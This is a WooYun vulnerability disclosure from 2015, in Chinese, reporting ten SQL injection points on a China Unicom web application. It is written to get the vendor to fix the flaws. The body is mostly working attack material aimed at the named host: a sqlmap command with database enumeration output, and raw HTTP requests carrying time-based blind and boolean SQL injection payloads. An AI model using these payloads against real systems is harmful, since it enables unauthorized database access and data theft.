当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129847

漏洞标题:运营商安全之中国联通10处SQL注入

相关厂商:中国联通

漏洞作者: 路人甲

提交时间:2015-08-04 12:43

修复时间:2015-09-20 18:42

公开时间:2015-09-20 18:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-04: 细节已通知厂商并且等待厂商处理中
2015-08-06: 厂商已经确认,细节仅向厂商公开
2015-08-16: 细节向核心白帽子及相关领域专家公开
2015-08-26: 细节向普通白帽子公开
2015-09-05: 细节向实习白帽子公开
2015-09-20: 细节向公众公开

简要描述:

只为能上个首页而已

详细说明:

sqlmap.py -u "http://www.chinaunicom-a.com/chinaunicom.do?field=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&frametype=4&season=3&size=20&start=1&year=" --current-db


1.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: fast=1&field=if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5)))uWAF) AND 'ozgN'='ozgN'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/&frametype=2&month=&search=&season=&size=16&start=1&year=
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3
back-end DBMS: MySQL 5.0.12
current database:    'ChinaUnicom'
tem: Linux CentOS 5.10
web application technology: Apache 2.2.3, JSP
back-end DBMS: MySQL 5.0.12
current database:    'ChinaUnicom'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://www.chinaunicom-a.com:80/chinaunicom.do?field=(select(0)from(select(sleep(0)))v)/' AND (SELECT * FROM (SELECT(SLEEP(5)))CULU) AND 'FNqF'='FNqF'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/&frametype=4&season=3&size=20&start=1&year=
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, JSP
back-end DBMS: MySQL 5.0.12
current database:    'ChinaUnicom'


第二处:

POST /chinaunicom.do HTTP/1.1
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.chinaunicom-a.com:80/
Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2
Host: www.chinaunicom-a.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
fast=1&field=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&frametype=2&month=&search=&season=&size=16&start=1&year=


2.jpg


第三处:

POST /chinaunicom.do HTTP/1.1
Content-Length: 208
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.chinaunicom-a.com:80/
Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2
Host: www.chinaunicom-a.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
fast=1&field=glzd&frametype=2&month=&search=&season=&size=16&start=1&year=


3.jpg


第四处:

POST /chinaunicom.do HTTP/1.1
Content-Length: 208
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.chinaunicom-a.com:80/
Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2
Host: www.chinaunicom-a.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
fast=1&field=glzd&frametype=2&month=&search=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&season=&size=16&start=1&year=


第五处:

POST /chinaunicom.do HTTP/1.1
Content-Length: 1136
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_GVYKMYTBQI
X-Requested-With: XMLHttpRequest
Referer: http://www.chinaunicom-a.com:80/
Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2
Host: www.chinaunicom-a.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_TNFOEBSVKH
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="fast"
1
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="field"
ltgg
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="frametype"
9
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="imageField2"
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="month"
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="search"
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="search2"
e%' AND 3*2*1=6 AND '000WQWL'!='000WQWL%
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="season"
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="size"
10
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="start"
1
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="year"
2015
-------AcunetixBoundary_TNFOEBSVKH
Content-Disposition: form-data; name="year1"
-------AcunetixBoundary_TNFOEBSVKH--


第六处:

POST /chinaunicom.do HTTP/1.1
Content-Length: 208
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.chinaunicom-a.com:80/
Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2
Host: www.chinaunicom-a.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
fast=1&field=glzd&frametype=2&month=&search=&season=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&size=16&start=1&year=


第七处:

http://www.chinaunicom-a.com:80//chinaunicom.do?field=dqbg&frametype=4&season=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&size=20&start=1&year=


第八处:

POST /chinaunicom.do HTTP/1.1
Content-Length: 208
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.chinaunicom-a.com:80/
Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2
Host: www.chinaunicom-a.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
fast=1&field=glzd&frametype=2&month=&search=&season=&size=16&start=1&year=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/


第九处:

POST /chinaunicom.do HTTP/1.1
Content-Length: 202
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.chinaunicom-a.com:80/
Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2
Host: www.chinaunicom-a.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
field=pgsms&frametype=7&month=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&search=&season=&size=20&start=1&year=


第十处:

POST /search.do HTTP/1.1
Content-Length: 345
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_BAXFSAEFBU
X-Requested-With: XMLHttpRequest
Referer: http://www.chinaunicom-a.com:80/
Cookie: JSESSIONID=6CCA621A426732355B4BDC6A538815F2
Host: www.chinaunicom-a.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_XTWDESPVHX
-------AcunetixBoundary_XTWDESPVHX
Content-Disposition: form-data; name="field"
index
-------AcunetixBoundary_XTWDESPVHX
Content-Disposition: form-data; name="imageField"
-------AcunetixBoundary_XTWDESPVHX
Content-Disposition: form-data; name="search"
-1' OR 3*2*1=6 AND 000711=000711 -- 
-------AcunetixBoundary_XTWDESPVHX--

漏洞证明:

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-06 18:41

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国联合网络通信股份有限公司通报,由其后续协调网站管理部门处置。

最新状态:

暂无